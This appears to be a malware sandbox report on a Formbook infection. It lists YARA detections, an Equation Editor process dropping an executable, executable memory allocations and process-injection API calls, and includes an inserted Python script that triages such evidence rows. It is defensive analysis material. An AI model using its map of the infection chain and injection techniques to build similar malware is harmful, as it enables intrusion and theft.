Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\tynex.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe
Source: C:\Users\Public\tynex.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\tynex.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tynex.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tynex.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135A100 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135A050 NtClose,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01359F20 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01359FD0 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135A04C NtClose,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135A0FA NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01359F1A NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01359FCA NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009900C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00990048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00990078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009910D0 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00990060 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009901D4 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0099010C NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00991148 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009907AC NtCreateMutant,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098F8CC NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098F938 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00991930 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FAB8 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FA20 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FA50 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FBE8 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FB50 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FC30 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FC48 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00990C40 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00991D80 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FD5C NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FE24 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FFFC NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E0048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E0078 NtResumeThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E0060 NtQuerySection,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E10D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E1148 NtOpenThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E01D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DF8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DF938 NtWriteFile,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E1930 NtSetContextThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E0C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E1D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008A050 NtClose,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008A100 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_00089F20 NtCreateFile,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_00089FD0 NtReadFile,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008A04C NtClose,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008A0FA NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_00089F1A NtCreateFile,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_00089FCA NtReadFile,
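The rows above are what a responder reads by hand: Equation Editor writing tynex.exe, executable allocations at 76E20000 and 76D20000 in every stage, and the NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread and NtQueueApcThread calls in both FB_C479.tmp.exe and the cscript.exe it lands in. The following Python is an added example, not code from the sandbox vendor or from this report: it parses evidence rows in this format (including the fused form extraction produces), flags executables written by EQNEDT32.EXE and executable allocations in the range where 32-bit system DLLs are mapped, and groups each process's native calls against two API sets. The sample rows are constructed from the report's own values; the 0x70000000 to 0x7FFFFFFF bound and the two API groupings are assumptions of this example, not the sandbox's published signature logic.

```python
"""Added example (not the sandbox's own code): triage of evidence rows in
the report's format. Sample rows are constructed; the injection API sets and
the system-DLL address range are this example's assumptions."""
import re
from collections import defaultdict

# Accepts "...exe | Code function: ..." and the fused "...exeCode function: ..."
# form that table extraction sometimes produces.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*"
    r"(?P<kind>File created|Memory allocated|Code function):\s*(?P<val>.*?)\s*$"
)

# Assumed groupings: a process that contains every call of a set gets the label.
INJECTION_PATTERNS = {
    "process hollowing": frozenset({"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                                    "NtSetContextThread", "NtResumeThread"}),
    "APC injection": frozenset({"NtQueueApcThread", "NtResumeThread"}),
}

# Assumed bounds of the region where 32-bit system DLLs (ntdll, kernel32, ...)
# are mapped; an explicit executable allocation there is what the rows show.
SYSTEM_DLL_RANGE = (0x70000000, 0x7FFFFFFF)

# Constructed sample shaped like the report rows (the third row is fused on purpose).
SAMPLE_LINES = r"""
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\tynex.exe
Source: C:\Users\Public\tynex.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tynex.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FFFC NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FE24 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00991930 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00990078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0098FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025DFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025E0078 NtResumeThread,
Source: C:\Users\Public\tynex.exe | Code function: 4_2_00293288
"""


def parse_lines(text):
    """Yield (source_process, kind, value) for every row that parses."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            yield m.group("src"), m.group("kind"), m.group("val")


def triage(text):
    """Summarise dropper, executable-allocation and injection evidence per process."""
    dropped, rwx_allocs = [], []
    apis = defaultdict(set)
    for src, kind, val in parse_lines(text):
        exe = src.rsplit("\\", 1)[-1].lower()
        if kind == "File created":
            # Equation Editor has no legitimate reason to write an executable.
            if exe == "eqnedt32.exe" and val.lower().endswith(".exe"):
                dropped.append((src, val))
        elif kind == "Memory allocated":
            addr = int(val.split()[0], 16)
            if SYSTEM_DLL_RANGE[0] <= addr <= SYSTEM_DLL_RANGE[1] and "execute" in val:
                rwx_allocs.append((src, addr))
        elif kind == "Code function":
            # "7_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk," -> Nt* names only
            _, _, called = val.partition(" ")
            apis[src].update(n for n in called.split(",") if n.startswith("Nt"))
    injection = {}
    for src, seen in apis.items():
        hits = sorted(name for name, need in INJECTION_PATTERNS.items() if need <= seen)
        if hits:
            injection[src] = hits
    return {"dropped": dropped, "rwx_allocs": rwx_allocs,
            "injection": injection, "apis": dict(apis)}


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for src, path in result["dropped"]:
        print("DROPPER   %s -> %s" % (src, path))
    for src, addr in result["rwx_allocs"]:
        print("RWX@%08X %s" % (addr, src))
    for src, hits in result["injection"].items():
        print("INJECTION %s: %s" % (src, ", ".join(hits)))
```

The grouping is deliberately coarse: it says nothing about call order, so a process that merely resolves these exports (as cscript.exe does after it is hollowed) scores the same as the injector. Pair it with the parent/child relationships in the process tree before drawing conclusions.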
Source: C:\Users\Public\tynex.exe | Code function: 4_2_00293288
Source: C:\Users\Public\tynex.exe | Code function: 4_2_00293286
Source: C:\Users\Public\tynex.exe | Code function: 4_2_00B565F8
Source: C:\Users\Public\tynex.exe | Code function: 4_2_00B56608
Source: C:\Users\Public\tynex.exe | Code function: 4_2_046E6AB0
Source: C:\Users\Public\tynex.exe | Code function: 4_2_046E53C2
Source: C:\Users\Public\tynex.exe | Code function: 4_2_046E538B
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135D166
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01341030
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135E376
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01342D90
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135D773
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01342FB0
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135BFA6
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_01349E30
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0135E6D5
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0099E0C6
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009CD005
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009B905A
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009A3040
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0099E2E9
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A41238
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009C63DB
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0099F3CF
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009A2305
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009A7353
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009EA37B
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009B1489
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009D5485
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009BC5F0
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009A351F
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009A4680
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009AE6C1
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A42622
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009AC7BC
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A2579A
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009D57C3
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A3F8EE
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009AC85C
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009C286D
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009A29B2
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A4098E
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009B69FE
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A25955
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A53A83
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A4CBA4
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_0099FBD7
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A2DBDA
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009C7B00
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_00A3FDDD
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009D0D3B
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009ACD5B
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009D2E2F
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009BEE4C
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009B0F3F
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: 7_2_009CDF7C
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02691238
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025EE2E9
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025F7353
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0263A37B
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025F2305
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025EF3CF
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_026163DB
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_026963BF
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025F3040
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0260905A
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0261D005
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025EE0C6
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02692622
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0263A634
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025FE6C1
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025F4680
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_026257C3
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025FC7BC
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0267579A
